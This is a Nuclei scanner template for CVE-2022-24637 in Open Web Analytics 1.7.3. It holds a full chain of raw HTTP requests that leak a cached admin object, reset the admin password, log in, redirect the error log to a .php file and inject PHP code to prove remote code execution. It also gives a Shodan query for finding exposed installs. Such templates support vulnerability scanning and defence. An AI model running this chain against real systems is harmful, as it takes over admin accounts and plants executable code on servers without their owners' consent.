nuclei-templates/http/cves/2022/CVE-2022-24637.yaml

167 lines
5.0 KiB
YAML

id: CVE-2022-24637
info:
name: Open Web Analytics 1.7.3 - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled by the PHP interpreter.
reference:
- https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/open_web_analytics_rce.rb
- http://packetstormsecurity.com/files/171389/Open-Web-Analytics-1.7.3-Remote-Code-Execution.html
- https://github.com/Open-Web-Analytics/Open-Web-Analytics/releases/tag/1.7.4
- https://github.com/Pflegusch/CVE-2022-24637
- https://github.com/c0derpwner/HTB-pwned
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-24637
cwe-id: CWE-269
epss-score: 0.84852
epss-percentile: 0.98585
cpe: cpe:2.3:a:openwebanalytics:open_web_analytics:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 6
vendor: openwebanalytics
product: open_web_analytics
shodan-query: cpe:"cpe:2.3:a:openwebanalytics:open_web_analytics"
tags: cve,cve2022,packetstorm,rce,intrusive,open-web-analytics
variables:
password: "{{randbase(8)}}@123!"
secret: "{{randstr}}"
secret_b64: "{{base64(secret)}}"
flow: |
http(1);
http(2);
javascript();
http(3);
http(4); http(5); http(6); http(7);
javascript:
- code: |
idx=serobj.indexOf('temp_passkey');
passubstr=serobj.substring(idx,idx+120);
temp_pass=(passubstr.match(/s:32:"([a-f0-9]{32})"/)[1])
temp_pass
args:
serobj: "{{base64_decode(serializedobj)}}"
http:
- raw:
- |
POST /index.php?owa_do=base.loginForm&owa_site_id=& HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
owa_user_id=admin&owa_password=wrong+password+xyz&owa_go=&owa_action=base.login&owa_submit_btn=Login
matchers:
- type: word
part: body
words:
- "Login Failed"
internal: true
- raw:
- |
GET /owa-data/caches/1/owa_user/c30da9265ba0a4704db9229f864c9eb7.php HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
group: 1
name: serializedobj
internal: true
regex:
- '<\?php\\n\/\*([A-Za-z0-9=]+)\*\/\\n\?>'
matchers:
- type: word
part: body
words:
- <?php\n
internal: true
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
owa_password={{password}}&owa_password2={{password}}&owa_k={{javascript_response}}&owa_action=base.usersChangePassword&owa_submit_btn=Save+Your+New+Password
matchers:
- type: dsl
dsl:
- "contains(location,'owa_status_code=3006')"
- "status_code==302"
internal: true
condition: and
- raw:
- |
POST /index.php?owa_do=base.loginForm&owa_site_id=& HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
owa_user_id=admin&owa_password={{password}}&owa_go=&owa_action=base.login&owa_submit_btn=Login
matchers:
- type: dsl
dsl:
- "contains(set_cookie,'owa_p')"
- "status_code==302"
internal: true
condition: and
- raw:
- |
GET /index.php?owa_do=base.optionsGeneral HTTP/1.1
Cookie: owa_p={{http_4_owa_p}};owa_u=admin;
Host: {{Hostname}}
extractors:
- type: regex
part: body
group: 1
name: nonce
internal: true
regex:
- 'name="owa_nonce" value="([a-z0-9]+)">'
- raw:
- |
POST /index.php?owa_do=base.optionsGeneral HTTP/1.1
Host: {{Hostname}}
Cookie: owa_p={{http_4_owa_p}};owa_u=admin;
Content-Type: application/x-www-form-urlencoded
owa_action=base.optionsUpdate&owa_nonce={{nonce}}&owa_config[base.error_log_file]=owa-data/caches/{{randstr}}.php&owa_config[base.error_log_level]=2
- raw:
- |
POST /index.php?owa_do=base.optionsGeneral HTTP/1.1
Host: {{Hostname}}
Cookie: owa_p={{http_4_owa_p}};owa_u=admin;
Content-Type: application/x-www-form-urlencoded
owa_action=base.optionsUpdate&owa_nonce={{nonce}}&owa_config[shell]=<?php+echo base64_decode('{{secret_b64}}');?>
- |
GET /owa-data/caches/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '[debug_log]'
- "{{secret}}"
condition: and
# digest: 4a0a00473045022100e94386ddc33681e185a6c154e69b5501a492605b69fffc69959a9f2985a7c06702201ff3aeb6c72b0bfa5ff0ae95eabef98133abc3a2665abe135cb5f13877b171b1:922c64590222798bb761d5b6d8e72950